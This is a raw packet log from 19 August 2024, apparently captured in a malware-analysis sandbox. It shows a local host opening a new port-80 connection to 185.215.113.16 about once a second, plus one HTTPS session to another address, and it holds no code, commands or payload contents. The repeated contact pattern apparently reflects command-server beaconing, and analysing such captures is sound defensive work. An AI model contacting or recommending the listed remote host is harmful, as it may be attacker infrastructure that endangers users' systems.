Aug 19, 2024 06:05:27.072444916 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.075248003 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.080147982 CEST	80	49809	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:27.350570917 CEST	80	49809	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:27.350763083 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.466106892 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.466600895 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.471540928 CEST	80	49809	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:27.471602917 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.471657038 CEST	80	49810	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:27.471728086 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.472063065 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:27.477220058 CEST	80	49810	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:28.249026060 CEST	80	49810	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:28.252454042 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.255187988 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.261768103 CEST	80	49810	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:28.588134050 CEST	80	49810	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:28.588264942 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.701801062 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.702156067 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.707097054 CEST	80	49811	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:28.707567930 CEST	80	49810	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:28.707640886 CEST	49810	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.707660913 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.707921028 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:28.712738037 CEST	80	49811	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:29.515255928 CEST	80	49811	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:29.518474102 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.521100998 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.525949955 CEST	80	49811	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:29.772826910 CEST	80	49811	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:29.772901058 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.900614977 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.900909901 CEST	49812	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.905713081 CEST	80	49811	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:29.905726910 CEST	80	49812	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:29.905776024 CEST	49811	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.905817032 CEST	49812	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.906773090 CEST	49812	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:29.911573887 CEST	80	49812	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:30.655612946 CEST	80	49812	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:30.655755997 CEST	49812	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:30.658690929 CEST	49812	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:30.658972025 CEST	49813	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:30.663784027 CEST	80	49813	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:30.663897038 CEST	80	49812	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:30.663986921 CEST	49812	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:30.664858103 CEST	49813	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:30.665323019 CEST	49813	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:30.670139074 CEST	80	49813	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:31.417057991 CEST	80	49813	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:31.418457031 CEST	49813	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:31.558206081 CEST	49813	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:31.558480978 CEST	49814	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:31.563338995 CEST	80	49814	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:31.563414097 CEST	80	49813	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:31.563499928 CEST	49813	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:31.564009905 CEST	49814	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:31.564009905 CEST	49814	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:31.568834066 CEST	80	49814	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:32.313817024 CEST	80	49814	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:32.314050913 CEST	49814	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:32.321496964 CEST	49814	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:32.321779013 CEST	49815	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:32.327135086 CEST	80	49815	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:32.327222109 CEST	49815	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:32.327714920 CEST	49815	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:32.327956915 CEST	80	49814	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:32.328017950 CEST	49814	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:32.332715034 CEST	80	49815	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:33.092701912 CEST	80	49815	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:33.092777014 CEST	49815	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:33.216671944 CEST	49815	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:33.217040062 CEST	49816	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:33.222002029 CEST	80	49816	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:33.222069025 CEST	80	49815	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:33.222089052 CEST	49816	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:33.222203016 CEST	49815	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:33.224997997 CEST	49816	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:33.229788065 CEST	80	49816	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:33.983516932 CEST	80	49816	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:33.986552000 CEST	49816	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:34.089250088 CEST	49816	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:34.089586973 CEST	49817	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:34.094500065 CEST	80	49817	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:34.094647884 CEST	49817	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:34.094738007 CEST	80	49816	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:34.094922066 CEST	49816	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:34.095273972 CEST	49817	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:34.100090981 CEST	80	49817	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.003401041 CEST	80	49817	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.003462076 CEST	49817	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.125999928 CEST	49817	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.126341105 CEST	49818	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.131234884 CEST	80	49818	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.131341934 CEST	80	49817	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.131414890 CEST	49817	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.131434917 CEST	49818	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.131999969 CEST	49818	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.136814117 CEST	80	49818	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.923862934 CEST	80	49818	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.923950911 CEST	49818	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.931586981 CEST	49818	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.931898117 CEST	49819	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.936758995 CEST	80	49819	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.936836958 CEST	80	49818	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:35.936928988 CEST	49818	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.936943054 CEST	49819	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.939166069 CEST	49819	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:35.945283890 CEST	80	49819	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:36.693325043 CEST	80	49819	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:36.696476936 CEST	49819	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:36.812658072 CEST	49819	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:36.812961102 CEST	49820	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:36.822397947 CEST	80	49820	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:36.822468042 CEST	49820	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:36.822781086 CEST	80	49819	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:36.822994947 CEST	49819	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:36.823158979 CEST	49820	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:36.832163095 CEST	80	49820	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:37.611102104 CEST	80	49820	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:37.611186028 CEST	49820	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:37.616657972 CEST	49820	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:37.617147923 CEST	49821	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:37.621747971 CEST	80	49820	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:37.621898890 CEST	49820	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:37.621983051 CEST	80	49821	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:37.622236013 CEST	49821	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:37.622591972 CEST	49821	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:37.627382040 CEST	80	49821	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:38.378863096 CEST	80	49821	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:38.378937006 CEST	49821	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:38.495762110 CEST	49821	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:38.496252060 CEST	49822	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:38.501199007 CEST	80	49821	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:38.501247883 CEST	80	49822	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:38.501301050 CEST	49821	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:38.501332998 CEST	49822	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:38.501614094 CEST	49822	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:38.506397963 CEST	80	49822	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:39.277391911 CEST	80	49822	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:39.280513048 CEST	49822	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:39.300066948 CEST	49822	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:39.300349951 CEST	49823	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:39.305164099 CEST	80	49823	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:39.305203915 CEST	80	49822	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:39.305296898 CEST	49822	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:39.305313110 CEST	49823	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:39.305632114 CEST	49823	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:39.310421944 CEST	80	49823	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:40.047751904 CEST	80	49823	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:40.047820091 CEST	49823	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.279408932 CEST	49823	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.279719114 CEST	49824	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.284617901 CEST	80	49824	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:40.284791946 CEST	49824	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.287497997 CEST	49824	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.292361975 CEST	80	49824	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:40.293854952 CEST	80	49823	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:40.294092894 CEST	49823	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.329910040 CEST	49824	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.341028929 CEST	49825	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.345931053 CEST	80	49825	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:40.345994949 CEST	49825	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.346482038 CEST	49825	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:40.351351023 CEST	80	49825	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:41.321682930 CEST	80	49825	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:41.321784019 CEST	49825	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:41.467571020 CEST	49825	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:41.467859030 CEST	49826	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:41.473135948 CEST	80	49826	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:41.473280907 CEST	49826	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:41.473609924 CEST	80	49825	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:41.473654985 CEST	49825	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:41.473840952 CEST	49826	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:41.478615999 CEST	80	49826	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:42.226744890 CEST	80	49826	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:42.226967096 CEST	49826	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:42.233067036 CEST	49826	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:42.233344078 CEST	49827	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:42.238399982 CEST	80	49827	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:42.238534927 CEST	49827	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:42.238723993 CEST	80	49826	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:42.238825083 CEST	49826	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:42.239003897 CEST	49827	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:42.243763924 CEST	80	49827	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:42.998763084 CEST	80	49827	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:42.998840094 CEST	49827	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.112653017 CEST	49827	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.113632917 CEST	49828	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.118185043 CEST	80	49827	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:43.118287086 CEST	49827	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.118597031 CEST	80	49828	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:43.118664026 CEST	49828	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.122188091 CEST	49828	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.127373934 CEST	80	49828	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:43.868618965 CEST	80	49828	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:43.868825912 CEST	49828	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.881005049 CEST	49828	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.881426096 CEST	49829	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.886193991 CEST	80	49828	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:43.886241913 CEST	80	49829	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:43.886286974 CEST	49828	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.886321068 CEST	49829	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.892182112 CEST	49829	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:43.897775888 CEST	80	49829	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:44.638798952 CEST	80	49829	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:44.640485048 CEST	49829	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:44.748888016 CEST	49829	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:44.749157906 CEST	49830	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:44.754235983 CEST	80	49829	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:44.754492044 CEST	80	49830	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:44.754581928 CEST	49829	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:44.754615068 CEST	49830	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:44.755187035 CEST	49830	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:44.760045052 CEST	80	49830	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:45.495402098 CEST	80	49830	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:45.495457888 CEST	49830	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:45.498388052 CEST	49830	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:45.499032974 CEST	49831	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:45.503462076 CEST	80	49830	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:45.503525019 CEST	49830	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:45.503799915 CEST	80	49831	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:45.503864050 CEST	49831	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:45.504431009 CEST	49831	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:45.509196043 CEST	80	49831	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:46.279033899 CEST	80	49831	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:46.279133081 CEST	49831	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:46.406770945 CEST	49831	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:46.407058954 CEST	49832	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:46.411885977 CEST	80	49832	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:46.411963940 CEST	49832	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:46.412010908 CEST	80	49831	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:46.412050962 CEST	49831	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:46.412867069 CEST	49832	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:46.417659044 CEST	80	49832	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:47.179949045 CEST	80	49832	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:47.180140018 CEST	49832	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:47.219248056 CEST	49832	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:47.220110893 CEST	49833	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:47.224468946 CEST	80	49832	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:47.224523067 CEST	49832	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:47.224920988 CEST	80	49833	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:47.225018024 CEST	49833	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:47.226733923 CEST	49833	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:47.231534958 CEST	80	49833	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:47.978416920 CEST	80	49833	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:47.978853941 CEST	49833	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.092995882 CEST	49833	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.093260050 CEST	49834	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.098166943 CEST	80	49834	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:48.098346949 CEST	80	49833	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:48.098455906 CEST	49833	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.098457098 CEST	49834	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.098694086 CEST	49834	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.103465080 CEST	80	49834	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:48.876153946 CEST	80	49834	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:48.876533031 CEST	49834	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.879226923 CEST	49834	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.879508018 CEST	49835	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.884325027 CEST	80	49835	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:48.884376049 CEST	80	49834	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:48.884497881 CEST	49834	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.888437033 CEST	49835	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.916273117 CEST	49835	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:48.921267986 CEST	80	49835	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:49.666708946 CEST	80	49835	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:49.666815996 CEST	49835	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:49.775795937 CEST	49835	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:49.776102066 CEST	49836	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:49.780946016 CEST	80	49836	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:49.781034946 CEST	49836	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:49.781042099 CEST	80	49835	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:49.781091928 CEST	49835	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:49.781270981 CEST	49836	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:49.786047935 CEST	80	49836	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:50.529617071 CEST	80	49836	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:50.529711008 CEST	49836	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:50.690274954 CEST	49836	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:50.690669060 CEST	49837	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:50.697773933 CEST	80	49837	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:50.697832108 CEST	49837	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:50.698182106 CEST	80	49836	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:50.698224068 CEST	49837	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:50.698255062 CEST	49836	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:50.702994108 CEST	80	49837	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:51.480015993 CEST	80	49837	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:51.480328083 CEST	49837	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:51.591584921 CEST	49837	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:51.591887951 CEST	49838	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:51.596805096 CEST	80	49838	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:51.596870899 CEST	49838	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:51.596879959 CEST	80	49837	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:51.596929073 CEST	49837	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:51.597208023 CEST	49838	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:51.602022886 CEST	80	49838	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:52.327269077 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:52.327326059 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:52.327428102 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:52.355118990 CEST	80	49838	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:52.358724117 CEST	49838	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:52.365613937 CEST	49838	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:52.365988016 CEST	49840	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:52.370783091 CEST	80	49840	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:52.370930910 CEST	49840	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:52.371012926 CEST	80	49838	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:52.371094942 CEST	49838	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:52.373312950 CEST	49840	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:52.374857903 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:52.374902010 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:52.378190041 CEST	80	49840	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:53.017925024 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.018018961 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.093981028 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.094018936 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.095010042 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.095084906 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.100676060 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.126596928 CEST	80	49840	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:53.132488012 CEST	49840	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:53.144525051 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.516524076 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.516554117 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.516588926 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.516611099 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.516644955 CEST	443	49839	23.210.122.61	192.168.2.4
Aug 19, 2024 06:05:53.516683102 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.516683102 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.516710043 CEST	49839	443	192.168.2.4	23.210.122.61
Aug 19, 2024 06:05:53.550374031 CEST	49840	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:53.550648928 CEST	49841	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:53.555476904 CEST	80	49841	185.215.113.16	192.168.2.4
